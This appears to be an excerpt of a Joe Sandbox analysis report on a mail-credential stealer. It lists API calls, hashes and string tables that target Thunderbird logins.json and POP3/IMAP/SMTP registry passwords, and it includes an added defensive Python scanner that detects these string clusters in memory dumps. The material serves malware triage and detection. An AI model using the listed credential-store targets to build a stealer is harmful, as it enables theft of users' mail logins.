• Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
• Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
• Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040285B
  • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
• _mbscpy.MSVCRT ref: 00402895
  • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
• _mbscpy.MSVCRT ref: 0040296D
  • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: QueryValue_mbscpy$ByteCharMultiWidememset
• String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
• API String ID: 1497257669-167382505
• Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
• Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
• Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
• Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
Uniqueness
Uniqueness Score: -1.00%
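Three of the routines listed above are the mail-credential harvesting code the "Tries to steal Mail credentials" signatures fire on: one walks Thunderbird's logins.json (encryptedUsername, encryptedPassword, hostname, httpRealm, imap://%s, smtp://%s, ...), and two read per-account registry values with RegQueryValueExA (POP3 Server, IMAP User Name, Password2, SMTP Use SSL, ...). The string tables are the cheapest triage handle on an unpacked dump such as the wab.jbxd snapshot referenced here. The scanner below is an added example written for this report; it is not Joe Sandbox, Remcos or WebBrowserPassView code. It goes slightly beyond the listing: it requires several distinct, whole NUL-terminated names within one window of the image (so lone generic words such as "hostname" or "Password" do not fire), and it checks both ANSI and UTF-16LE encodings. The window size, the distinct-name threshold and the SAMPLE_DUMP buffer are assumptions made for the example, not values taken from the sample.

```python
"""Added example, not code from the Joe Sandbox report or from Remcos/WebBrowserPassView.

Flags the mail-credential string clusters seen in the routines above when run over
a memory dump or unpacked PE. A cluster must contain several distinct, NUL-terminated
names within one window of the image, which keeps generic words from firing alone.
"""
from typing import Dict, List, Tuple

# logins.json keys and URL formats referenced by the routine at 0040E123..0040E374 above.
THUNDERBIRD_LOGINS_JSON = [
    "logins", "hostname", "httpRealm", "encryptedUsername", "encryptedPassword",
    "usernameField", "passwordField", "imap://%s", "mailbox://%s", "smtp://%s",
]
# Registry value names queried by the routine at 004024E7..004025EF above.
OUTLOOK_ACCOUNT_VALUES = [
    "POP3 Server", "POP3 User Name", "POP3 Port", "IMAP Server", "IMAP User Name",
    "SMTP Server", "SMTP Email Address", "SMTP Display Name", "HTTPMail Server", "Password2",
]
# Value names used by the routine at 0040285B..0040296D above (data narrowed with WideCharToMultiByte).
MAIL_ACCOUNT_VALUES = [
    "POP3 Server", "POP3 User", "IMAP Server", "IMAP User", "SMTP Server", "SMTP User",
    "HTTP Server URL", "Email", "Display Name", "Password",
]
INDICATOR_SETS: Dict[str, List[str]] = {
    "thunderbird_logins_json": THUNDERBIRD_LOGINS_JSON,
    "outlook_account_registry": OUTLOOK_ACCOUNT_VALUES,
    "mail_account_registry": MAIL_ACCOUNT_VALUES,
}


def _is_print(b: int) -> bool:
    return 0x20 <= b <= 0x7E


def find_cstrings(data: bytes, text: str, wide: bool) -> List[int]:
    """Offsets where `text` occurs as a whole NUL-terminated ANSI or UTF-16LE string.

    Whole-string matching matters: "Password" must not match inside "Password2",
    nor "POP3 User" inside "POP3 User Name".
    """
    needle = text.encode("utf-16-le") if wide else text.encode("ascii")
    term = b"\x00\x00" if wide else b"\x00"
    hits, start = [], 0
    while True:
        i = data.find(needle, start)
        if i < 0:
            return hits
        if wide:  # preceded by a printable wide char -> suffix of a longer string
            suffix_of_longer = i >= 2 and data[i - 1] == 0 and _is_print(data[i - 2])
        else:
            suffix_of_longer = i >= 1 and _is_print(data[i - 1])
        terminated = data[i + len(needle):i + len(needle) + len(term)] == term
        if terminated and not suffix_of_longer:
            hits.append(i)
        start = i + 1


def densest_cluster(hits: List[Tuple[int, str]], window: int) -> Tuple[int, List[str]]:
    """Largest set of distinct names whose offsets lie within `window` bytes of a start hit."""
    hits = sorted(hits)
    best_start, best_names = -1, set()
    for idx, (start, _) in enumerate(hits):
        names = {name for off, name in hits[idx:] if off - start <= window}
        if len(names) > len(best_names):
            best_start, best_names = start, names
    return best_start, sorted(best_names)


def scan_for_mail_stealer(data: bytes, window: int = 4096, min_distinct: int = 5) -> Dict[str, dict]:
    """Per credential store: whether a string cluster is present, which names, and where."""
    report = {}
    for store, names in INDICATOR_SETS.items():
        hits = [(off, n) for n in names for wide in (False, True)
                for off in find_cstrings(data, n, wide)]
        start, matched = densest_cluster(hits, window)
        report[store] = {"hit": len(matched) >= min_distinct,
                         "matched": matched,
                         "at": start if matched else None}
    return report


def cstring_table(strings: List[str], wide: bool = False) -> bytes:
    """NUL-separated string table, as a compiler emits it into .rdata."""
    enc, term = ("utf-16-le", b"\x00\x00") if wide else ("ascii", b"\x00")
    return b"".join(s.encode(enc) + term for s in strings)


# Constructed stand-in for a dump (assumption, not data from the analysed sample): an Outlook
# value table right after a fake MZ header, INT3 filler, then a UTF-16LE Thunderbird table.
SAMPLE_DUMP = (
    b"MZ" + b"\x00" * 62
    + cstring_table(OUTLOOK_ACCOUNT_VALUES[:8])
    + b"\xcc" * 3000
    + cstring_table(THUNDERBIRD_LOGINS_JSON[:7], wide=True)
    + b"\xcc" * 512
)

if __name__ == "__main__":
    for store, result in scan_for_mail_stealer(SAMPLE_DUMP).items():
        print(f"{store:26s} hit={result['hit']!s:5s} distinct={len(result['matched'])} at={result['at']}")
```

The threshold of five distinct names is deliberately above the three server names ("POP3 Server", "IMAP Server", "SMTP Server") that the two registry value sets share, so a hit on one Outlook generation does not also claim the other; raise the window if the dump was captured from a relocated or partially overwritten image. Run it against the .sdmp named in the Memory Dump Source lines to confirm which stores an unpacked payload targets before spending time in the disassembly.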

APIs
• EndDialog.USER32(?,?), ref: 0040F600
• GetDlgItem.USER32(?,000003EA), ref: 0040F618
• SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
• SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
• SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
• memset.MSVCRT ref: 0040F675
• memset.MSVCRT ref: 0040F695
• memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • {Unknown}, xrefs: 0040F67A
                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                      • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                      • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                      • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                                                                                      • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                      • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                        • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                                                        • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                                                        • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                      • API String ID: 2303586283-933021314
                                                                                                                                                                                                                      • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                      • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$memsetsprintf$_mbscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 633282248-1996832678
• Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
• Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
• Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
• Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 710961058-601624466
• Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
• Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
• Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
• Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: sprintf$memset$_mbscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 3402215030-3842416460
• Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
• Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
• Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
• Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
• API String ID: 231171946-1411472696
• Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
• Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
• Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
• Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
• String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
• API String ID: 1012775001-1916105108
• Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
• Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
• Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
• Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
  • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
  • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
  • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
  • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
  • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
  • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
  • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
• strlen.MSVCRT ref: 0040EAF0
• strlen.MSVCRT ref: 0040EAFE
• memset.MSVCRT ref: 0040EB3F
• strlen.MSVCRT ref: 0040EB4E
• strlen.MSVCRT ref: 0040EB5C
• memset.MSVCRT ref: 0040EB9D
• strlen.MSVCRT ref: 0040EBAC
• strlen.MSVCRT ref: 0040EBBA
• _strcmpi.MSVCRT ref: 0040EC68
• _mbscpy.MSVCRT ref: 0040EC83
  • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
  • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
• String ID: logins.json$none$signons.sqlite$signons.txt
• API String ID: 3884059725-3138536805
• Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
• Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
• Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
• Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 1439213657-1959339147
• Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
• Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
• Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
• Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00443AF6
  • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
• strlen.MSVCRT ref: 00443B12
• memset.MSVCRT ref: 00443B4C
• memset.MSVCRT ref: 00443B60
• memset.MSVCRT ref: 00443B74
• memset.MSVCRT ref: 00443B9A
  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
  • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
• memcpy.MSVCRT ref: 00443BD1
  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
• memcpy.MSVCRT ref: 00443C0D
• memcpy.MSVCRT ref: 00443C1F
• _mbscpy.MSVCRT ref: 00443CF6
• memcpy.MSVCRT ref: 00443D27
• memcpy.MSVCRT ref: 00443D39
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset$strlen$_mbscpy
• String ID: salu
• API String ID: 3691931180-4177317985
• Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
• Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
• Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
• Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
• FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
• API String ID: 2449869053-232097475
• Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
• Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
• Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
• Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
• memset.MSVCRT ref: 00403EBB
• memset.MSVCRT ref: 00403ECF
• memset.MSVCRT ref: 00403EE3
• sprintf.MSVCRT ref: 00403F04
• _mbscpy.MSVCRT ref: 00403F20
• sprintf.MSVCRT ref: 00403F57
• sprintf.MSVCRT ref: 00403F88
Strings
• <table dir="rtl"><tr><td>, xrefs: 00403F1A
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
